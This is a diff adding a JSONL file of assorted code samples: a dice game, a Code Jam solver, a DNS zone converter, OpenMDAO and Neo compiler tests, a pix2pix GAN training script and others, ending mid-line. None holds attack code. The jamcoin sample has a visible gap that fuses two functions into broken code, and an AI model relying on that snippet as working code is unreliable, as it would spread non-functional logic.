diff --git "a/159.jsonl" "b/159.jsonl" new file mode 100644--- /dev/null +++ "b/159.jsonl" @@ -0,0 +1,621 @@ +{"seq_id":"315695654","text":"\"\"\"programme de jeu de dés\"\"\"\n# importation des bibliothèques utiles\nimport random\nimport time\n\nprint (\"Jeu de des\")\n\n# Déclaration des dessins des dés\nValeurs_de = {\n\t\"1\": [\" ------- \",\"| |\",\"| o |\",\"| |\",\" ------- \"],\n\t\"2\": [\" ------- \",\"| o |\",\"| |\",\"| o |\",\" ------- \"],\n\t\"3\": [\" ------- \",\"| o |\",\"| o |\",\"| o |\",\" ------- \"],\n\t\"4\": [\" ------- \",\"| o o |\",\"| |\",\"| o o |\",\" ------- \"],\n\t\"5\": [\" ------- \",\"| o o |\",\"| o |\",\"| o o |\",\" ------- \"],\n\t\"6\": [\" ------- \",\"| o o |\",\"| o o |\",\"| o o |\",\" ------- \"]}\n\n# ---------------------------------------\n# ------- BOUCLE PRINCIPALE -----------\n# ---------------------------------------\nwhile True :\n\ttry :\n\t\t# Determination des deux lancers\n\t\tjoueur = random.randint(1,6)\n\t\tprint ('Votre lancer : ')\n\t\tfor ligne in range(len(Valeurs_de['1'])):\n\t\t\tprint(Valeurs_de[str(joueur)][ligne])\n\t\tfeather = random.randint(1,6)\n\t\tprint ('Au tour de la carte Feather...')\n\t\ttime.sleep(2)\n\t\tfor ligne in range(len(Valeurs_de['1'])):\n\t\t\tprint(Valeurs_de[str(feather)][ligne])\n\t\t# Determination du gagnant\n\t\tif joueur > feather :\n\t\t\tprint ('Vous gagnez !!')\n\t\telif joueur < feather :\n\t\t\tprint ('Vous perdez !!')\n\t\telse :\n\t\t\tprint ('Match nul...')\n\t\t# Demande pour rejouer\n\t\tnouvelle_partie = str(input('Voulez-vous rejouer (o/n) ?'))\n\t\tnouvelle_partie = nouvelle_partie.upper()\n\t\tif nouvelle_partie != 'O' :\n\t\t\tbreak\n\texcept KeyboardInterrupt :\n\t\tprint (\"Au revoir...\")\n\t\tbreak\n","sub_path":"Chapitre_3/Code/6-3-2/code_v2.py","file_name":"code_v2.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"338742410","text":"#!/usr/bin/env python\nimport sys\nfrom operator import add\nfrom functools import reduce\nfrom itertools import combinations\n\nimport numpy as np\n\nevaluate_jam = lambda s,b: reduce(add,([int(c)*(b**(len(s)-n-1)) for n,c in enumerate(s)]))\n\n#Generate a JamCoin (a^N+1)(a^n1 + a^n2 + ... + 1)\ndef generateJam(N,K,k):\n\n\t#Safety check\n\tassert (k=ndraws:\n\t\t\treturn combos[:ndraws]\n\n\n#####################\n#########Main########\n#####################\n\nline = lambda : sys.stdin.readline().strip(\"\\n\")\n\ndef main():\n\n\t#Number of test cases\n\tntest = int(line())\n\tassert ntest==1\n\n\t#Cycle over test cases\n\tfor t in range(ntest):\n\n\t\t#Read in N,J\n\t\tN,J = [int(c) for c in line().split(\" \")]\n\n\t\t#Write preamble\n\t\tsys.stdout.write(\"Case #{0}:\\n\".format(t+1))\n\n\t\t#Generate J draws for the JamCoins\n\t\tk_draws = drawk(11,J)\n\t\tfor k in k_draws:\n\t\t\tcoin,divisors = generateJam(N,N-11-1,np.array((11,)+k+(0,)))\n\t\t\tsys.stdout.write(coin + \" \" + \" \".join([ str(d) for d in divisors ]) + \"\\n\")\n\nif __name__==\"__main__\":\n\tmain()","sub_path":"solutions_5738606668808192_1/Python/apetri/coinLarge.py","file_name":"coinLarge.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"437315349","text":"import click,json\nfrom hyperdns.netdns import ZoneData\n \n\n\n@click.command()\n@click.option('--in',type=click.File('r'),default='-',help=\"File to load, or stdin\")\n@click.option('--out',type=click.File('w'),default='-',help=\"file to save, or stdout\")\n@click.option('--bind',default=False,is_flag=True,help=\"Emit bind file instead of json\")\n@click.pass_context\ndef xlate(ctx,**kwargs):\n \"\"\"Translate zone information\n \"\"\"\n \n input_data=kwargs['in'].read()\n outfile=kwargs['out']\n bind=kwargs['bind']\n try:\n jsonobject=json.loads(input_data)\n try:\n zonedata=ZoneData.fromDict(jsonobject)\n except Exception as E:\n click.echo(\"Syntactically valid, semantically invalid JSON:%s\" % E)\n raise\n \n except ValueError as E:\n try:\n zonedata=ZoneData.fromZonefileText(input_data)\n except Exception as E:\n click.echo(\"Failed to process input as either JSON or BIND file:%s\" % E)\n raise\n \n except Exception as E:\n click.echo(\"Failed to interpret input:%s\" % E)\n raise\n \n if bind:\n print(\"%s\" % zonedata.zonefile)\n else:\n print(\"%s\" % zonedata._as_json())\n\n","sub_path":"hyperdns/netdns/cli/xlate.py","file_name":"xlate.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"572294256","text":"for i in range(int(input())):\n x= int(input())\n if x%4==0:\n print(\"North\")\n elif x%4==1:\n print(\"East\")\n elif x%4==2:\n print(\"South\")\n else:\n print(\"West\")","sub_path":"facedir.py","file_name":"facedir.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"565551037","text":"# Run script for the continuous 3-D wing-truss optimization problem\n# Dr. John T. Hwang\n# Sicheng He\n# June, 2016\n\nfrom __future__ import division\nimport numpy\nimport time\n\nfrom openmdao.api import IndepVarComp, Problem, Group, ScipyOptimizer, SqliteRecorder, pyOptSparseDriver\nfrom stiffness import SysDispAug, SysDisplacements, SysCompliance, SysVolume\nfrom utils import setup_problem, writeBDF\nfrom openmdao.devtools.partition_tree_n2 import view_tree\n\n\n\nE = 100.0e9\n\n\nu1 = 0.005\nu2 = 0.995\n\ngeom_file = '../CRM_AVL/wing_coarse.avl'\nupp_file = '../airfoils/rae2822_upp.txt'\nlow_file = '../airfoils/rae2822_low.txt'\nresults_file = '../CRM_AVL/results_coarse.txt'\n\nfactor = 1\n\nxyz, nodes, elements, cons, forces, forcesArray = setup_problem(u1, u2, geom_file, upp_file, low_file, results_file,factor)\nforces /= 1.e1\n\nroot = Group()\nroot.add('comp_areas',\n IndepVarComp([('areas', 4.e-3 * numpy.ones(elements.shape[0]))]),\n promotes=['*'])\nroot.add('sys_disp_aug',\n SysDispAug(nodes, elements, forces.flatten(), cons, E),\n promotes=['*'])\nroot.add('sys_displacements',\n SysDisplacements(nodes, cons),\n promotes=['*'])\nroot.add('sys_compliance',\n SysCompliance(nodes, forces),\n promotes=['*'])\nroot.add('sys_volume',\n SysVolume(elements, numpy.ones(len(elements))),\n promotes=['*'])\n\nprob = Problem()\nprob.root = root\n#prob.root.deriv_options['type'] = 'fd'\nprob.setup()\n\nt0 = time.time()\nprob.run()\nt1 = time.time()\n\n#print t1-t0\n\nnodes0 = nodes\nnodes1 = nodes + prob['disp']\n\nwriteBDF('jig.bdf', nodes0, elements+1)\nwriteBDF('deflected.bdf', nodes1, elements+1)\n\nif 0:\n prob.check_partial_derivatives(compact_print=True)\n exit()\n\nprob.driver = pyOptSparseDriver()\nprob.driver.options['optimizer'] = \"SNOPT\"\nprob.driver.opt_settings = {'Major optimality tolerance': 1.0e-7,\n 'Major feasibility tolerance': 1.0e-7,\n 'Iterations limit': int(1e6),\n}\n\nprob.driver.add_desvar('areas',lower=0.0001, upper=0.1, scaler=1e0) # test\nprob.driver.add_objective('compliance', scaler=1e0)\nprob.driver.add_constraint('volume', upper=0.5) #0.630832724832)\n# setup data recording\nprob.driver.add_recorder(SqliteRecorder('data.db'))\nprob.setup()\n#view_tree(prob, outfile=\"aerostruct.html\", show_browser=True)\nprob.run()\n\nwriteBDF('optimized.bdf', nodes+prob['disp'], elements+1)\n","sub_path":"openmdao/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"79091822","text":"from boa3 import constants\nfrom boa3.boa3 import Boa3\nfrom boa3.model.builtin.interop.interop import Interop\nfrom boa3.neo.cryptography import hash160\nfrom boa3.neo.vm.opcode.Opcode import Opcode\nfrom boa3.neo.vm.type.Integer import Integer\nfrom boa3.neo.vm.type.String import String\nfrom boa3_test.tests.boa_test import BoaTest\nfrom boa3_test.tests.test_classes.contract.neomanifeststruct import NeoManifestStruct\nfrom boa3_test.tests.test_classes.testengine import TestEngine\n\n\nclass TestBlockchainInterop(BoaTest):\n\n default_folder: str = 'test_sc/interop_test/blockchain'\n\n def test_get_current_height(self):\n expected_output = (\n Opcode.SYSCALL\n + Interop.CurrentHeight.getter.interop_method_hash\n + Opcode.RET\n )\n\n path = self.get_contract_path('CurrentHeight.py')\n output = Boa3.compile(path)\n self.assertEqual(expected_output, output)\n\n def test_current_height_cant_assign(self):\n expected_output = (\n Opcode.INITSLOT\n + b'\\x01\\x01'\n + Opcode.LDARG0\n + Opcode.STLOC0\n + Opcode.LDLOC0\n + Opcode.RET\n )\n\n path = self.get_contract_path('CurrentHeightCantAssign.py')\n output = Boa3.compile(path)\n self.assertEqual(expected_output, output)\n\n def test_get_contract(self):\n from boa3.neo3.contracts import CallFlags\n call_flag = Integer(CallFlags.ALL).to_byte_array(signed=True, min_length=1)\n expected_output = (\n Opcode.INITSLOT\n + b'\\x00\\x01'\n + Opcode.LDARG0\n + Opcode.PUSH1\n + Opcode.PACK\n + Opcode.PUSHDATA1\n + Integer(len(Interop.GetContract.method_name)).to_byte_array(min_length=1)\n + String(Interop.GetContract.method_name).to_bytes()\n + Opcode.PUSHDATA1\n + Integer(len(constants.MANAGEMENT_SCRIPT)).to_byte_array(min_length=1)\n + constants.MANAGEMENT_SCRIPT\n + Opcode.PUSHDATA1\n + Integer(len(call_flag)).to_byte_array(min_length=1)\n + call_flag\n + Opcode.ROT\n + Opcode.ROT\n + Opcode.SYSCALL\n + Interop.CallContract.interop_method_hash\n + Opcode.RET\n )\n path = self.get_contract_path('GetContract.py')\n output = Boa3.compile(path)\n self.assertEqual(expected_output, output)\n\n engine = TestEngine()\n result = self.run_smart_contract(engine, path, 'main', bytes(20))\n self.assertIsNone(result)\n\n call_contract_path = self.get_contract_path('test_sc/arithmetic_test', 'Addition.py')\n Boa3.compile_and_save(call_contract_path)\n\n script, manifest = self.get_output(call_contract_path)\n nef, manifest = self.get_bytes_output(call_contract_path)\n call_hash = hash160(script)\n call_contract_path = call_contract_path.replace('.py', '.nef')\n\n engine.add_contract(call_contract_path)\n\n result = self.run_smart_contract(engine, path, 'main', call_hash)\n self.assertEqual(5, len(result))\n self.assertEqual(call_hash, result[2])\n self.assertEqual(nef, result[3])\n manifest_struct = NeoManifestStruct.from_json(manifest)\n self.assertEqual(manifest_struct, result[4])\n","sub_path":"boa3_test/tests/compiler_tests/test_interop/test_blockchain.py","file_name":"test_blockchain.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"7364311","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\nPATH = 'G:/공유 드라이브/Team_project/01_data/'\n\nBUFFER_SIZE = 1000\nBATCH_SIZE = 1\nIMG_WIDTH = 1280\nIMG_HEIGHT = 720\n\ndef load(image_file):\n image = tf.io.read_file(image_file)\n image = tf.image.decode_jpeg(image)\n \n image = tf.cast(image, tf.float32)\n \n return image\n\ndef resize(input_image, real_image, height, width):\n input_image = tf.image.resize(input_image, [height, width], method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)\n real_image = tf.image.resize(real_image, [height, width], method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)\n\n return input_image, real_image\n\ndef random_crop(input_image, real_image):\n stacked_image = tf.stack([input_image, real_image], axis=0)\n cropped_image = tf.image.random_crop(stacked_image, size=[2, IMG_HEIGHT, IMG_WIDTH, 3])\n\n return cropped_image[0], cropped_image[1]\n\n# normalizing the images to [-1, 1]\ndef normalize(input_image, real_image):\n input_image = (input_image / 127.5) - 1\n real_image = (real_image / 127.5) - 1\n\n return input_image, real_image\n\n@tf.function()\ndef random_jitter(input_image, real_image):\n # resizing to 286 x 286 x 3\n input_image, real_image = resize(input_image, real_image, 800, 1400)\n\n # randomly cropping to 256 x 256 x 3\n input_image, real_image = random_crop(input_image, real_image)\n\n if tf.random.uniform(()) > 0.5:\n # random mirroring\n input_image = tf.image.flip_left_right(input_image)\n real_image = tf.image.flip_left_right(real_image)\n\n return input_image, real_image\n\ndef load_image_train(image_file, real_image):\n input_image, real_image = load(image_file), load(real_image)\n input_image, real_image = random_jitter(input_image, real_image)\n input_image, real_image = normalize(input_image, real_image)\n\n return input_image, real_image\n\ndef load_image_test(image_file, real_image):\n input_image, real_image = load(image_file), load(real_image)\n input_image, real_image = resize(input_image, real_image, IMG_HEIGHT, IMG_WIDTH)\n input_image, real_image = normalize(input_image, real_image)\n\n return input_image, real_image\n\n# train_data\ninput_img = tf.data.Dataset.list_files(PATH + 'train/train_input_img/*.jpg', shuffle=False)\noutput_img = tf.data.Dataset.list_files(PATH + 'train/train_target_img/*.jpg', shuffle=False)\nprint(input_img)\nprint(output_img)\n\ntrain_dataset = tf.data.Dataset.zip((input_img, output_img))\nprint(train_dataset)\n\ntrain_dataset = train_dataset.map(load_image_train, num_parallel_calls=tf.data.experimental.AUTOTUNE)\ntrain_dataset = train_dataset.shuffle(BUFFER_SIZE)\ntrain_dataset = train_dataset.batch(BATCH_SIZE)\n\n# test_data\ninput_img = tf.data.Dataset.list_files(PATH + 'test/test_input_img/*.jpg', shuffle=False)\noutput_img = tf.data.Dataset.list_files(PATH + 'test/test_target_img/*.jpg', shuffle=False)\n\ntest_dataset = tf.data.Dataset.zip((input_img, output_img))\n\ntest_dataset = test_dataset.map(load_image_test)\ntest_dataset = test_dataset.shuffle(BUFFER_SIZE)\ntest_dataset = test_dataset.batch(BATCH_SIZE)\n\n# val_data\ninput_train_dataset = train_dataset.take(800)\ninput_val_dataset = train_dataset.skip(800)\ninput_val_dataset = input_val_dataset.take(200)\n\nprint(input_train_dataset)\nprint(input_val_dataset)\nprint(test_dataset)\n\n_, ax = plt.subplots(4, 2, figsize=(10, 15))\nfor i, (example_input, example_target) in enumerate(test_dataset.take(4)):\n ax[i, 0].imshow(example_input[0])\n ax[i, 1].imshow(example_target[0])\n ax[i, 0].set_title(\"Input image\")\n ax[i, 0].set_title(\"Input image\")\n ax[i, 1].set_title(\"Translated image\")\n ax[i, 0].axis(\"off\")\n ax[i, 1].axis(\"off\")\nplt.tight_layout()\nplt.show()\n\n\n# Modeling\nclass ReflectionPadding2D(layers.Layer):\n \"\"\"Implements Reflection Padding as a layer.\n\n Args:\n padding(tuple): Amount of padding for the\n spatial dimensions.\n\n Returns:\n A padded tensor with the same type as the input tensor.\n \"\"\"\n\n def __init__(self, padding=(1, 1), **kwargs):\n self.padding = tuple(padding)\n super(ReflectionPadding2D, self).__init__(**kwargs)\n\n def call(self, input_tensor, mask=None):\n padding_width, padding_height = self.padding\n padding_tensor = [\n [0, 0],\n [padding_height, padding_height],\n [padding_width, padding_width],\n [0, 0],\n ]\n return tf.pad(input_tensor, padding_tensor, mode=\"REFLECT\")\n\nkernel_init = keras.initializers.RandomNormal(mean=0.0, stddev=0.02)\ngamma_init = keras.initializers.RandomNormal(mean=0.0, stddev=0.02)\n\ndef residual_block(\n x,\n activation,\n kernel_initializer=kernel_init,\n kernel_size=(3, 3),\n strides=(1, 1),\n padding=\"valid\",\n gamma_initializer=gamma_init,\n use_bias=False,\n):\n dim = x.shape[-1]\n input_tensor = x\n\n x = ReflectionPadding2D()(input_tensor)\n x = layers.Conv2D(\n dim,\n kernel_size,\n strides=strides,\n kernel_initializer=kernel_initializer,\n padding=padding,\n use_bias=use_bias,\n )(x)\n x = layers.BatchNormalization(gamma_initializer=gamma_initializer)(x)\n x = activation(x)\n\n x = ReflectionPadding2D()(x)\n x = layers.Conv2D(\n dim,\n kernel_size,\n strides=strides,\n kernel_initializer=kernel_initializer,\n padding=padding,\n use_bias=use_bias,\n )(x)\n x = layers.BatchNormalization(gamma_initializer=gamma_initializer)(x)\n x = layers.add([input_tensor, x])\n return x\n\n\ndef downsample(\n x,\n filters,\n activation,\n kernel_initializer=kernel_init,\n kernel_size=(3, 3),\n strides=(2, 2),\n padding=\"same\",\n gamma_initializer=gamma_init,\n use_bias=False,\n):\n x = layers.Conv2D(\n filters,\n kernel_size,\n strides=strides,\n kernel_initializer=kernel_initializer,\n padding=padding,\n use_bias=use_bias,\n )(x)\n x = layers.BatchNormalization(gamma_initializer=gamma_initializer)(x)\n if activation:\n x = activation(x)\n return x\n\n\ndef upsample(\n x,\n filters,\n activation,\n kernel_size=(3, 3),\n strides=(2, 2),\n padding=\"same\",\n kernel_initializer=kernel_init,\n gamma_initializer=gamma_init,\n use_bias=False,\n):\n x = layers.Conv2DTranspose(\n filters,\n kernel_size,\n strides=strides,\n padding=padding,\n kernel_initializer=kernel_initializer,\n use_bias=use_bias,\n )(x)\n x = layers.BatchNormalization(gamma_initializer=gamma_initializer)(x)\n if activation:\n x = activation(x)\n return x\n\n\n# GENERATOR\ndef get_generator(basic_filters=64,kernel_size=4,drop_out=0.5,alpha=0,name=None):\n \n initializer = tf.random_normal_initializer(0.,0.02)\n inputs = layers.Input(shape=(720,1280,3), name=name + \"_img_input\")\n layer1 = layers.Conv2D(filters = basic_filters,kernel_size=4,strides=2,padding='same',use_bias=False,kernel_initializer=initializer)(inputs)\n layer1 = layers.LeakyReLU()(layer1)\n layer1_ = layer1\n \n layer2 = layers.Conv2D(filters=basic_filters*2,kernel_size=kernel_size,strides=2,padding='same',use_bias=False,kernel_initializer=initializer)(layer1)\n layer2_ = layers.BatchNormalization()(layer2)\n layer2 = layers.LeakyReLU()(layer2_)\n \n layer3 = layers.Conv2D(filters=basic_filters*4,kernel_size=kernel_size,strides=2,padding='same',use_bias=False,kernel_initializer=initializer)(layer2)\n layer3_ = layers.BatchNormalization()(layer3)\n layer3 = layers.LeakyReLU()(layer3_)\n \n layer4 = layers.Conv2D(filters=basic_filters*8,kernel_size=kernel_size,strides=(2,2),padding='same',use_bias=False,kernel_initializer=initializer)(layer3)\n layer4_ = layers.BatchNormalization()(layer4)\n layer4 = layers.LeakyReLU()(layer4_)\n \n layer5 = layers.Conv2D(filters=basic_filters*8,kernel_size=kernel_size,strides=(3,2),padding='same',use_bias=False,kernel_initializer=initializer)(layer4)\n layer5_ = layers.BatchNormalization()(layer5)\n layer5 = layers.LeakyReLU()(layer5_)\n \n layer6 = layers.Conv2D(filters=basic_filters*8,kernel_size=kernel_size,strides=(3,2),padding='same',use_bias=False,kernel_initializer=initializer)(layer5)\n layer6_ = layers.BatchNormalization()(layer6)\n layer6 = layers.LeakyReLU()(layer6_)\n \n layer7 = layers.Conv2D(filters=basic_filters*8,kernel_size=kernel_size,strides=(1,2),padding='same',use_bias=False,kernel_initializer=initializer)(layer6)\n layer7_ = layers.BatchNormalization()(layer7)\n layer7 = layers.LeakyReLU()(layer7_)\n \n layer8 = layers.Conv2D(filters=basic_filters*16,kernel_size=kernel_size,strides=(1,2),padding='same',use_bias=False,kernel_initializer=initializer)(layer7)\n layer8_ = layers.BatchNormalization()(layer8)\n layer8 = layers.LeakyReLU()(layer8_)\n \n # 가운데\n layer9 = layers.Conv2D(filters=basic_filters*16,kernel_size=kernel_size,strides=(5,5),padding='same',use_bias=False,kernel_initializer=initializer)(layer8)\n layer9_ = layers.BatchNormalization()(layer9)\n layer9 = layers.LeakyReLU()(layer9_)\n # 가운데\n \n layer10 = layers.Conv2DTranspose(filters=basic_filters*16,kernel_size=kernel_size,strides=(5,5),padding='same',kernel_initializer=initializer,use_bias=False)(layer9)\n layer10 = layers.BatchNormalization()(layer10)\n layer10 = layer10+layer8_\n layer10 = layers.Dropout(drop_out)(layer10)\n layer10 = layers.ReLU()(layer10)\n \n layer11 = layers.Conv2DTranspose(filters=basic_filters*8,kernel_size=kernel_size,strides=(1,2),padding='same',kernel_initializer=initializer,use_bias=False)(layer10)\n layer11 = layers.BatchNormalization()(layer11)\n layer11 = layer11+layer7_\n layer11 = layers.Dropout(drop_out)(layer11)\n layer11 = layers.ReLU()(layer11)\n \n layer12 = layers.Conv2DTranspose(filters=basic_filters*8,kernel_size=kernel_size,strides=(1,2),padding='same',kernel_initializer=initializer,use_bias=False)(layer11)\n layer12 = layers.BatchNormalization()(layer12)\n layer12 = layer12+layer6_\n layer12 = layers.Dropout(drop_out)(layer12)\n layer12 = layers.ReLU()(layer12)\n \n layer13 = layers.Conv2DTranspose(filters=basic_filters*8,kernel_size=kernel_size,strides=(3,2),padding='same',kernel_initializer=initializer,use_bias=False)(layer12)\n layer13 = layers.BatchNormalization()(layer13)\n layer13 = layer13+layer5_\n layer13 = layers.Dropout(drop_out)(layer13)\n layer13 = layers.ReLU()(layer13)\n \n layer14 = layers.Conv2DTranspose(filters=basic_filters*8,kernel_size=kernel_size,strides=(3,2),padding='same',kernel_initializer=initializer,use_bias=False)(layer13)\n layer14 = layers.BatchNormalization()(layer14)\n layer14 = layer14+layer4_\n layer14 = layers.Dropout(drop_out)(layer14)\n layer14 = layers.ReLU()(layer14)\n \n layer15 = layers.Conv2DTranspose(filters=basic_filters*4,kernel_size=kernel_size,strides=(2,2),padding='same',kernel_initializer=initializer,use_bias=False)(layer14)\n layer15 = layers.BatchNormalization()(layer15)\n layer15 = layer15+layer3_\n layer15 = layers.Dropout(drop_out)(layer15)\n layer15 = layers.ReLU()(layer15)\n \n layer16 = layers.Conv2DTranspose(filters=basic_filters*2,kernel_size=kernel_size,strides=(2,2),padding='same',kernel_initializer=initializer,use_bias=False)(layer15)\n layer16 = layers.BatchNormalization()(layer16)\n layer16 = layer16+layer2_\n layer16 = layers.Dropout(drop_out)(layer16)\n layer16 = layers.ReLU()(layer16)\n \n layer17 = layers.Conv2DTranspose(filters=basic_filters,kernel_size=kernel_size,strides=(2,2),padding='same',kernel_initializer=initializer,use_bias=False)(layer16)\n layer17 = layers.BatchNormalization()(layer17)\n layer17 = layer17+layer1_\n layer17 = layers.Dropout(drop_out)(layer17)\n layer17 = layers.ReLU()(layer17)\n \n outputs_ = layers.Conv2DTranspose(filters=3,kernel_size=kernel_size,strides=2,padding='same',kernel_initializer=initializer,use_bias=False,activation='tanh')(layer17)\n\n model = keras.models.Model(inputs=inputs,outputs=outputs_)\n \n return model\n\n# DISCRIMINATOR\ndef get_discriminator(\n filters=64, kernel_initializer=kernel_init, num_downsampling=5, name=None\n):\n img_input = layers.Input(shape=(720,1280,3), name=name + \"_img_input\")\n x = layers.Conv2D(\n filters,\n (4, 4),\n strides=(2, 2),\n padding=\"same\",\n kernel_initializer=kernel_initializer,\n )(img_input)\n x = layers.LeakyReLU(0.2)(x)\n\n num_filters = filters\n for num_downsample_block in range(5):\n num_filters *= 2\n if num_downsample_block < 4:\n x = downsample(\n x,\n filters=num_filters,\n activation=layers.LeakyReLU(0.2),\n kernel_size=(4, 4),\n strides=(2, 2),\n )\n else:\n x = downsample(\n x,\n filters=num_filters,\n activation=layers.LeakyReLU(0.2),\n kernel_size=(4, 4),\n strides=(1, 1),\n )\n\n x = layers.Conv2D(\n 1, (4, 4), strides=(1, 1), padding=\"same\", kernel_initializer=kernel_initializer\n )(x)\n\n model = keras.models.Model(inputs=img_input, outputs=x, name=name)\n return model\n\n# Get the generators\ngen_G = get_generator(name=\"generator_G\")\n# gen_F = get_generator(name=\"generator_F\")\n\n# Get the discriminators\n# disc_X = get_discriminator(name=\"discriminator_X\")\ndisc_Y = get_discriminator(name=\"discriminator_Y\")\n\ngen_G.summary()\nprint(gen_G)\n# print(gen_F)\ndisc_Y.summary()\n# print(disc_X)\nprint(disc_Y)\n\n\n\n\n# Build the Pix2Pix model\nclass Pix2Pix(keras.Model):\n def __init__(\n self,\n generator_G,\n discriminator_Y,\n LAMBDA=100\n ):\n super(Pix2Pix, self).__init__()\n self.gen_G = generator_G\n self.disc_Y = discriminator_Y\n self.LAMBDA = LAMBDA\n\n def compile(\n self,\n gen_G_optimizer,\n disc_Y_optimizer,\n gen_loss_fn,\n disc_loss_fn,\n ):\n super(Pix2Pix, self).compile()\n self.gen_G_optimizer = gen_G_optimizer\n self.disc_Y_optimizer = disc_Y_optimizer\n self.generator_loss_fn = gen_loss_fn\n self.discriminator_loss_fn = disc_loss_fn\n\n def train_step(self, batch_data):\n real_x, real_y = batch_data\n Lambda = self.LAMBDA\n with tf.GradientTape(persistent=True) as gen_tape, tf.GradientTape(persistent=True) as disc_tape:\n # Generate fake image\n fake_y = self.gen_G(real_x, training=True)\n\n # Discriminator output\n disc_real_y = self.disc_Y(real_y, training=True)\n disc_fake_y = self.disc_Y(fake_y, training=True)\n\n # Generator adverserial loss\n gen_G_loss = self.generator_loss_fn(disc_fake_y, fake_y, real_y, Lambda)\n\n # Discriminator loss\n disc_Y_loss = self.discriminator_loss_fn(disc_real_y, disc_fake_y)\n\n # Get the gradients for the generators\n grads_G = gen_tape.gradient(gen_G_loss, self.gen_G.trainable_variables)\n\n # Get the gradients for the discriminators\n disc_Y_grads = disc_tape.gradient(disc_Y_loss, self.disc_Y.trainable_variables)\n\n # Update the weights of the generators\n self.gen_G_optimizer.apply_gradients(\n zip(grads_G, self.gen_G.trainable_variables)\n )\n # Update the weights of the discriminators\n self.disc_Y_optimizer.apply_gradients(\n zip(disc_Y_grads, self.disc_Y.trainable_variables)\n )\n\n return {\n \"G_loss\": gen_G_loss,\n \"D_Y_loss\": disc_Y_loss,\n }\n\n\n\n# Loss function for evaluating adversarial loss\nloss_object = tf.keras.losses.BinaryCrossentropy(from_logits=True)\n\n# Define the loss function for the generators\ndef generator_loss_fn(disc_generated_output, gen_output, target, LAMBDA):\n gan_loss = loss_object(tf.ones_like(disc_generated_output), disc_generated_output)\n\n # mean absolute error\n l1_loss = tf.reduce_mean(tf.abs(target - gen_output))\n\n total_gen_loss = gan_loss + (LAMBDA * l1_loss)\n\n return total_gen_loss\n\n# Define the loss function for the discriminators\ndef discriminator_loss_fn(disc_real_output, disc_generated_output):\n real_loss = loss_object(tf.ones_like(disc_real_output), disc_real_output)\n\n generated_loss = loss_object(tf.zeros_like(disc_generated_output), disc_generated_output)\n\n total_disc_loss = real_loss + generated_loss\n\n return total_disc_loss\n\n\n# Create pix2pix gan model\npix2pix_gan_model = Pix2Pix(\n generator_G=gen_G, discriminator_Y=disc_Y\n)\n\n# Compile the model\npix2pix_gan_model.compile(\n gen_G_optimizer=keras.optimizers.Adam(learning_rate=2e-4, beta_1=0.5),\n disc_Y_optimizer=keras.optimizers.Adam(learning_rate=2e-4, beta_1=0.5),\n gen_loss_fn=generator_loss_fn,\n disc_loss_fn=discriminator_loss_fn,\n)\n# Callbacks\ncheckpoint_filepath = \"./project/team/data/model_checkpoints_best\"\nmodel_checkpoint_callback = keras.callbacks.ModelCheckpoint(\n filepath=checkpoint_filepath,\n monitor='G_loss',\n mode='auto',\n save_best_only=True,\n verbose=1\n)\nreduce_lr = keras.callbacks.ReduceLROnPlateau(\n monitor='G_loss',\n factor=0.9,\n patience=8, \n mode='auto',\n verbose=1\n)\nearly_stopping = keras.callbacks.EarlyStopping(\n monitor='G_loss',\n patience=30,\n mode='auto'\n)\n# Here we will train the model for just one epoch as each epoch takes around\n# 7 minutes on a single P100 backed machine.\n\n# load_weights\n# weight_file = './project/team/data/model_checkpoints_ending'\n# pix2pix_gan_model.load_weights(weight_file).expect_partial()\n# print(\"Weights loaded successfully\")\n\ncount = 0\npix2pix_gan_model.fit(\n input_train_dataset,\n epochs=100,\n # callbacks=[model_checkpoint_callback], #, reduce_lr, early_stopping],\n validation_data=input_val_dataset\n)\n\npix2pix_gan_model.save_weights(\"./project/team/data/model_checkpoints_ending\")\n\n\n# Predict\n# weight_file = './project/team/data/model_checkpoints_ending'\n# pix2pix_gan_model.load_weights(weight_file).expect_partial()\n# print(\"Weights loaded successfully\")\n\n\n_, ax = plt.subplots(4, 2, figsize=(10, 15))\nfor i, (example_input, example_target) in enumerate(test_dataset.take(4)):\n prediction = pix2pix_gan_model.gen_G(example_input, training=False)[0].numpy()\n prediction = (prediction * 127.5 + 127.5).astype(np.uint8)\n example_input = (example_input[0] * 127.5 + 127.5).numpy().astype(np.uint8)\n\n ax[i, 0].imshow(example_input)\n ax[i, 1].imshow(prediction)\n ax[i, 0].set_title(\"Input image\")\n ax[i, 0].set_title(\"Input image\")\n ax[i, 1].set_title(\"Translated image\")\n ax[i, 0].axis(\"off\")\n ax[i, 1].axis(\"off\")\n\n prediction = keras.preprocessing.image.array_to_img(prediction)\n # prediction.save(\"predicted_img_{i}.png\".format(i=i))\nplt.tight_layout()\nplt.savefig('./project/team/data/predict_{}.png'.format(count))\nplt.show()\n","sub_path":"project/team/GAN/Pix2PixGAN_2.py","file_name":"Pix2PixGAN_2.py","file_ext":"py","file_size_in_byte":19074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"523221809","text":"import numpy as np \nn=int(input())\nar=np.zeros((n,n))\nk=0\nj=-1\nfor i in range(n*n):\n if(i%n==0):\n j=j+1\n if(k==n):\n k=0\n inp=input()\n ar[j,k]=inp\n k=k+1\na=int(input())\nfor i in range(0,n,a):\n for j in range(0,n,a):\n z=ar[i:i+a,j:j+a]\n average=int(np.sum(z)//(a*a))\n ar[i:i+a,j:j+a]=average\nprint(int((n*n)/(a*a)))\nprint 